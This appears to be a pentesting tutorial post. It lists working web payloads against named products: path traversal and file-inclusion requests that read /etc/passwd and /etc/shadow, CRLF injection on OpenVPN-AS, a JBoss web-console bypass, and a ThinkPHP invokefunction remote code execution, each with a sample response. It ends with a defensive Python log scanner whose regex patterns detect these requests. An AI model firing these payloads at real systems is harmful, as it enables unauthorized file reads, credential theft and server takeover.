Discovering Hidden Directories & Sensitive Files
    Even applications that are assumed to be secure can be checked for these weaknesses. Attackers may discover hidden directories and sensitive files that they can then leverage.

    Local File Inclusion

    An application exposing the URL /gui/file_viewer.php can be vulnerable to Local File Inclusion (LFI). More importantly, an attacker could append a file path to the uploaded_filename parameter; the application then processes that file by copying its content into a temporary directory inside the app's web root.

    Code:
    /gui/file_viewer.php?encrypt=N&target_folder=utilities&uploaded_filename=../../../../../../../etc/passwd
    By visiting the URL given in the Location header of the response, you'll see that the contents of the /etc/passwd file are displayed:

    [Image: pentesting-tutorial.jpg]

    CRLF Injection

    Another example is where an attacker could attempt to inject a line-break character such as %0A (the URL-encoded LF used in CRLF injection) into the following URL:
    Code:
    https://<host>/__session_start__/
    Code:
    GET /__session_start__/%0atest HTTP/1.1
    Host: <host>
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:75.0) Gecko/20100101 Firefox/75.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Connection: close
    Cookie: openvpn_sess_******=**********
    Pragma: no-cache
    Cache-Control: no-cache
    Code:
    /__session_start__/%0atest
    The response would be:
    Code:
    HTTP/1.1 302 Found
    Date: Sat, 25 Apr 2020 08:25:38 GMT
    Connection: close
    Content-Type: text/html; charset=UTF-8
    Location: https://<host>
    test
    Server: OpenVPN-AS
    
    <html>
           <body>
           <p>REDIRECT</p>
           </body>
    </html>
    We can see that the %0A is interpreted as a line break: the injected string "test" lands on its own line among the response headers, directly after the Location header, rather than staying inside the redirect URL.

    file_list.json

    An attacker could also alter the path to /+CSCOU+/../+CSCOE+/files/file_list.json to list particular files exposed by the web interface.

    Particularly:
    Code:
    /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/
    What's interesting is that the listing may reveal the user ID associated with each session. Such a vulnerability could permit an attacker to browse files and divulge sensitive information.

    Remote Code Execution

    An attacker could reach the web console of the JBoss instance running on localhost by requesting:
    Code:
    https://<host>/josso/%5C../web-console
    An attacker can route every request through /josso/%5C../web-console, which means they could do anything they wanted on the server, such as reading a backup SQL dump or altering the homepage.

    Directory Traversal & Local File Inclusion

    An attacker could gain unauthorized access to a targeted server's local file system through the logName parameter of the /server/logs/download URL.

    This allows sensitive local files such as /etc/passwd or /etc/shadow to be retrieved by the attacker inside a zip file.

    Example:
    Code:
    https://<host>/server/logs/download?logType=error&logName=../../../../../../../../etc/shadow&logSource=engine
    The response would be:
    Code:
    HTTP/1.1 200 OK
    Content-Type: application/octet-stream
    Content-Disposition: attachment; filename="shadow.zip"
    Connection: Close
    As you can see, the contents of /etc/shadow are contained in the downloaded shadow.zip file.

    /etc/passwd in /assets/

    The contents of /etc/passwd are potentially readable in the /assets/ directory:
    Code:
    /assets/file:%2f%2f/etc/passwd

    Remote Code Execution (RCE)

    Remote Code Execution can be performed via an HTTP request:
    Code:
    /public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
    Example:
    Code:
    http://<host>:8080/public//?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
    The response would look something like the following:
    Code:
    HTTP/1.1 200 OK
    Date: Sat, 25 Apr 2020 00:05:12 GMT
    Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
    X-Powered-By: PHP/5.4.45
    Content-Length: 60
    Connection: close
    Content-Type: text/html; charset=utf-8
    
    win-**********\administrator
    win-**********\administrator
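    As an added example (not code from the original post), here is a small Python scanner that flags the request patterns covered in the sections above after URL-decoding the request target: dot-dot traversal, injected line breaks, a file: scheme in the path, references to /etc/passwd or /etc/shadow, and the ThinkPHP invokefunction route. The log lines are constructed for the example and assume a combined-style access log.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (not real traffic): one per payload class above plus a benign request.
SAMPLE_LOG = """\
10.0.0.5 - - [25/Apr/2020:08:25:38 +0000] "GET /gui/file_viewer.php?encrypt=N&target_folder=utilities&uploaded_filename=../../../../../../../etc/passwd HTTP/1.1" 200 1842
10.0.0.5 - - [25/Apr/2020:08:25:40 +0000] "GET /__session_start__/%0atest HTTP/1.1" 302 0
10.0.0.5 - - [25/Apr/2020:08:25:41 +0000] "GET /+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions/ HTTP/1.1" 200 512
10.0.0.5 - - [25/Apr/2020:08:25:42 +0000] "GET /josso/%5C../web-console HTTP/1.1" 200 3301
10.0.0.5 - - [25/Apr/2020:08:25:43 +0000] "GET /server/logs/download?logType=error&logName=..%2f..%2f..%2fetc%2fshadow&logSource=engine HTTP/1.1" 200 220
10.0.0.5 - - [25/Apr/2020:08:25:44 +0000] "GET /assets/file:%2f%2f/etc/passwd HTTP/1.1" 200 1842
10.0.0.5 - - [25/Apr/2020:08:25:45 +0000] "GET /public//?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami HTTP/1.1" 200 60
10.0.0.7 - - [25/Apr/2020:08:26:00 +0000] "GET /gui/file_viewer.php?uploaded_filename=report.txt HTTP/1.1" 200 99
"""

# Pulls the request target out of the quoted request line of a combined-style log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Each rule is (label, regex applied to the fully decoded target); backslash counts as a separator for traversal.
RULES = [
    ("path-traversal", re.compile(r"(^|[/\\])\.\.([/\\]|$)")),
    ("crlf-injection", re.compile(r"[\r\n]")),
    ("file-scheme", re.compile(r"file:", re.IGNORECASE)),
    ("sensitive-file", re.compile(r"/etc/(passwd|shadow)\b")),
    ("thinkphp-invokefunction", re.compile(r"\\think\\app/invokefunction", re.IGNORECASE)),
]

def decode_target(target: str) -> str:
    """Percent-decode until stable so double-encoded payloads (e.g. %252f) are also seen."""
    previous = None
    while previous != target:
        previous, target = target, unquote(target)
    return target

def classify(line: str) -> list:
    # Returns the rule labels that match this log line's decoded request target.
    m = REQUEST_RE.search(line)
    if not m:
        return []
    decoded = decode_target(m.group("target"))
    return [label for label, rx in RULES if rx.search(decoded)]

def scan(log_text: str) -> list:
    """Return (line_number, raw_target, labels) for every suspicious request in the log."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        labels = classify(line)
        if labels:
            hits.append((n, REQUEST_RE.search(line).group("target"), labels))
    return hits
```

    Decoding before matching matters: the logName payload in line 5 never contains a literal "../" in the raw log, yet it resolves to the same /etc/shadow read as the earlier examples.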